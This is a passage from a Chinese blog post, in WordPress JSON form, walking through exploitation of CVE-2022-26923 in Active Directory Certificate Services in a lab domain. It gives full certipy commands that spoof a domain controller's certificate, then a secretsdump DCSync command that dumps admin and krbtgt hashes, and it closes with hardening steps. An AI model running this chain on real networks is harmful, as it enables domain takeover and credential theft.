class=\"ez-toc-section-end\"><\/span><\/h2>\n<ul>\n<li>\n<p>\u57df\u63a7\u5b89\u88c5\u4e86\u8bc1\u4e66\u670d\u52a1<\/p>\n<\/li>\n<li>\n<p>\u5177\u6709\u4e00\u4e2a\u6709\u6743\u9650\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u57df\u8d26\u53f7\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u6bcf\u4e2a\u666e\u901a\u57df\u8d26\u53f7\u6709\u6dfb\u52a010\u4e2a\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u6743\u9650<\/p>\n<\/li>\n<li>\n<p>\u8ba1\u7b97\u673a\u8d26\u53f7\u5177\u6709\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66\u6743\u9650\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u5177\u6709\u8fd9\u4e2a\u6743\u9650<br \/>\n<img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a8a7fe.\" alt=\"\" \/><\/p>\n<\/li>\n<li>\n<p>CVE-2022-26923\u8865\u4e01\u6ca1\u6253<\/p>\n<\/li>\n<li>\n<p>\u65e0\u8bba\u662f\u5426\u5f00\u542f\u4e86\u8bc1\u4e66Web\u6ce8\u518c\u63a5\u53e3\u90fd\u53ef\u4ee5\u6253\uff0c\u56e0\u4e3a\u901a\u8fc7rpc\u4e5f\u53ef\u4ee5\u6ce8\u518c\u8bc1\u4e66<\/p>\n<\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"%E4%B8%89%E3%80%81%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B\"><\/span>\u4e09\u3001\u5229\u7528\u8fc7\u7a0b<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><strong>\u6d4b\u8bd5\u73af\u5883\uff1a<\/strong><\/p>\n<table>\n<thead>\n<tr>\n<th>\u4e3b\u673a\u540d<\/th>\n<th>\u4e3b\u673aIP<\/th>\n<th>\u4e3b\u673a\u8d26\u6237<\/th>\n<th>\u4e3b\u673a\u63cf\u8ff0<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>dc-main-1.qiuqiu.com<\/td>\n<td>10.10.10.10<\/td>\n<td>qiuqiu.com\\domain_admin<\/td>\n<td>\u4e3b\u57df<\/td>\n<\/tr>\n<tr>\n<td>user1.qiuqiu.com<\/td>\n<td>10.100.0.6<\/td>\n<td>qiuqiu.com\\yefan<\/td>\n<td>\u666e\u901a\u57df\u5185\u673a\u5668\uff0c\u88ab\u653b\u51fb\u8005\u63a7\u5236<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3><span class=\"ez-toc-section\" 
id=\"1%E3%80%81%E5%AE%9A%E4%BD%8DADCS%E6%9C%8D%E5%8A%A1%E4%BB%A5%E5%8F%8ACA%E6%A0%B9%E8%AF%81%E4%B9%A6\"><\/span>1\u3001\u5b9a\u4f4dADCS\u670d\u52a1\u4ee5\u53caCA\u6839\u8bc1\u4e66<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u83b7\u53d6\u5230ADCS\u670d\u52a1\u5668\u5730\u5740\u4e3a<code>dc-main-1.qiuqiu.com<\/code>\uff0cCA\u6839\u8bc1\u4e66\u540d\u4e3a<code>qiuqiu-DC-MAIN-1-CA<\/code><\/p>\n<pre><code>certutil -dump -v<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a943c8.\" alt=\"\" \/><\/p>\n<p>\u5982\u679c\u653b\u51fb\u8005\u5728\u57df\u5916\uff0c\u53ef\u4ee5\u4f7f\u7528<code>certipy<\/code>\u5de5\u5177\u5b9a\u4f4d\uff0c\u9664\u4e86\u660e\u6587\u8d26\u5bc6\uff0c\u4e5f\u652f\u6301PTH\u65b9\u5f0f\u8ba4\u8bc1\uff1a<\/p>\n<pre><code>\/\/ pip\u5b89\u88c5\npip3 install certipy-ad\n\ncertipy find -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a9dd35.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"2%E3%80%81%E5%88%9B%E5%BB%BA%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E5%B9%B6%E8%AE%BE%E7%BD%AEdnshostname%E5%B1%9E%E6%80%A7\"><\/span>2\u3001\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7\u5e76\u8bbe\u7f6ednshostname\u5c5e\u6027<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<pre><code>certipy account create -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -user &quot;fake_cert&quot; -pass Test1234 -dns dc-main-1.qiuqiu.com -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27aa6211.\" alt=\"\" \/><\/p>\n<p>\u53ef\u4ee5\u5728\u57df\u63a7\u4e0a\u770b\u5230\uff0c\u65b0\u6dfb\u52a0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\uff0cdnshostname\u5b57\u6bb5\u4e0e\u5f53\u524d\u8d26\u53f7\u540d\u4e0d\u5339\u914d\uff1a<\/p>\n<p><img decoding=\"async\" 
src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27aaf67a.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"3%E3%80%81%E4%BD%BF%E7%94%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E7%94%B3%E8%AF%B7%E8%AE%A1%E7%AE%97%E6%9C%BA%E6%A8%A1%E6%9D%BF%E8%AF%81%E4%B9%A6\"><\/span>3\u3001\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u4f7f\u7528\u4e4b\u524d\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u8ba4\u8bc1\uff0c\u5e76\u4f7f\u7528ADCS\u4e2d\u7684CA\u6839\u8bc1\u4e66\u4e3a\u5f53\u524d\u8ba1\u7b97\u673a\u8d26\u53f7\u7b7e\u53d1\u4e00\u4e2a\u8ba1\u7b97\u673a\u6a21\u677f\u7684\u8bc1\u4e66\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u5f53\u8bc1\u4e66\u7533\u8bf7\u6210\u529f\u540e\uff0c\u8fd4\u56de\u7684dnshostname\u5b57\u6bb5\u4e3a\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\uff1a<\/p>\n<pre><code>certipy req -u fake_cert$ -p Test1234 -dc-ip 10.10.10.10 -ca qiuqiu-DC-MAIN-1-CA -template Machine -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ab9e63.\" alt=\"\" \/><\/p>\n<p>\u5728\u57df\u63a7\u4e0a\u53ef\u4ee5\u770b\u5230\u65b0\u9881\u53d1\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u8bc1\u4e66\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ac2d3d.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"4%E3%80%81%E4%BD%BF%E7%94%A8%E8%AF%81%E4%B9%A6%E8%BF%9B%E8%A1%8Ckerberos%E8%AE%A4%E8%AF%81%E5%B9%B6%E8%8E%B7%E5%BE%97%E5%AF%B9%E5%BA%94%E7%94%A8%E6%88%B7%E7%9A%84NTLM%E5%93%88%E5%B8%8C\"><\/span>4\u3001\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884ckerberos\u8ba4\u8bc1\u5e76\u83b7\u5f97\u5bf9\u5e94\u7528\u6237\u7684NTLM\u54c8\u5e0c<span 
class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u8bc1\u4e66\u901a\u8fc7kerberos\u8ba4\u8bc1\u540e\uff0c\u4f1a\u8fd4\u56de\u5bf9\u5e94\u7528\u6237\u7684TGT\u7968\u636e\uff0c\u5728TGT\u4e2d\u7684PAC\u4e2d\uff0c\u5305\u542b\u4e86\u7528\u6237\u7684NTLM\u54c8\u5e0c<\/p>\n<pre><code>certipy auth -pfx dc-main-1.pfx -dc-ip 10.10.10.10 -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27acb407.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"5%E3%80%81dcsync%E5%9F%9F%E6%8E%A7hash\"><\/span>5\u3001dcsync\u57df\u63a7hash<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<pre><code>secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:6ccc4c07fe69157e48976165a273b13b &quot;qiuqiu.com\/dc-main-1$@10.10.10.10&quot;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ad4a32.\" alt=\"\" \/><\/p>\n<p>\u83b7\u53d6\u5230\u57df\u7ba1\u4ee5\u53cakrbtgt\u8d26\u53f7\u7684hash\uff0c\u540e\u7eed\u5229\u7528\u4e0d\u518d\u8d58\u8ff0\u3002<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E5%9B%9B%E3%80%81%E5%8A%A0%E5%9B%BA%E6%96%B9%E6%A1%88\"><\/span>\u56db\u3001\u52a0\u56fa\u65b9\u6848<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<ul>\n<li>\n<p>\u7981\u7528\u666e\u901a\u57df\u7528\u6237\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7\uff08\u5c06\u57df\u7684ms-DS-MachineAccountQuota\u5c5e\u6027\u8bbe\u4e3a0\uff09<\/p>\n<\/li>\n<li>\n<p>\u5982\u65e0\u9700\u8981\uff0c\u7981\u6b62\u666e\u901a\u57df\u7528\u6237\u4ee5\u53ca\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8bc1\u4e66<\/p>\n<\/li>\n<li>\n<p>\u5b89\u88c5\u4fee\u590dCVE-2022-26923\u7684\u5b89\u5168\u66f4\u65b0<\/p>\n<\/li>\n<\/ul>\n<\/div><\/div>","protected":false},"excerpt":{"rendered":"<p>PKI\uff08Public Key 
Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI \u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002<\/p>\n","protected":false},"author":1,"featured_media":1022,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[322],"tags":[],"class_list":["post-1020","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=1020\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"PKI\uff08Public Key 
Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI \u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=1020\" \/>\n<meta property=\"og:site_name\" content=\"Wayne&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2023-09-21T14:42:47+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-05-08T08:51:33+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1996\" \/>\n\t<meta property=\"og:image:height\" content=\"966\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne&#039;s 
Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"ImageObject\",\"@id\":\"http:\/\/weizn.net\/?p=1020#primaryimage\",\"inLanguage\":\"zh-Hans\",\"url\":\"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg\",\"contentUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg\",\"width\":1996,\"height\":966},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=1020#webpage\",\"url\":\"http:\/\/weizn.net\/?p=1020\",\"name\":\"CVE-2022-26923\\u57df\\u63a7\\u8bc1\\u4e66\\u670d\\u52a1\\uff08ADCS\\uff09 - Wayne&#039;s Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#primaryimage\"},\"datePublished\":\"2023-09-21T14:42:47+00:00\",\"dateModified\":\"2026-05-08T08:51:33+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=1020\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=1020#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2022-26923\\u57df\\u63a7\\u8bc1\\u4e66\\u670d\\u52a1\\uff08ADCS\\uff09\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=1020#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"CVE-2022-26923\\u57df\\u63a7\\u8bc1\\u4e66\\u670d\\u52a1\\uff08ADCS\\uff09\",\"datePublished\":\"2023-09-21T14:42:47+00:00\",\"date
Modified\":\"2026-05-08T08:51:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#webpage\"},\"wordCount\":229,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"image\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#primaryimage\"},\"thumbnailUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg\",\"articleSection\":[\"\\u6280\\u672f\\u6587\\u7ae0\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=1020#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=1020","og_locale":"zh_CN","og_type":"article","og_title":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s Blog","og_description":"PKI\uff08Public Key Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI 
\u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002","og_url":"http:\/\/weizn.net\/?p=1020","og_site_name":"Wayne&#039;s Blog","article_published_time":"2023-09-21T14:42:47+00:00","article_modified_time":"2026-05-08T08:51:33+00:00","og_image":[{"width":1996,"height":966,"filesize":253117,"url":"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg","path":"\/app\/wp-content\/uploads\/2023\/06\/cert.jpg","size":"full","id":1022,"alt":"","pixels":1928136,"type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"2 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne&#039;s Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"ImageObject","@id":"http:\/\/weizn.net\/?p=1020#primaryimage","inLanguage":"zh-Hans","url":"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg","contentUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg","width":1996,"height":966},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=1020#webpage","url":"http:\/\/weizn.net\/?p=1020","name":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s 
Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"primaryImageOfPage":{"@id":"http:\/\/weizn.net\/?p=1020#primaryimage"},"datePublished":"2023-09-21T14:42:47+00:00","dateModified":"2026-05-08T08:51:33+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=1020#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=1020"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=1020#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=1020#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=1020#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09","datePublished":"2023-09-21T14:42:47+00:00","dateModified":"2026-05-08T08:51:33+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=1020#webpage"},"wordCount":229,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"image":{"@id":"http:\/\/weizn.net\/?p=1020#primaryimage"},"thumbnailUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg","articleSection":["\u6280\u672f\u6587\u7ae0"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=1020#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/1020","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.ph
p?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1020"}],"version-history":[{"count":2,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/1020\/revisions"}],"predecessor-version":[{"id":1023,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/1020\/revisions\/1023"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/media\/1022"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1020"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1020"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1020"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}